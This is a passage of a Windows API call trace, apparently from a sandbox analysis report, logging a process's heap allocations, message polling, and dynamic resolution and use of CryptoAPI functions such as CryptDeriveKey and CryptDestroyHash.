lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0265.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.092] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.093] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bc8 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51cb8 [0265.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51cb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.102] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.102] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.104] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0265.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.105] CryptDestroyHash (hHash=0xa87290) returned 1 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: 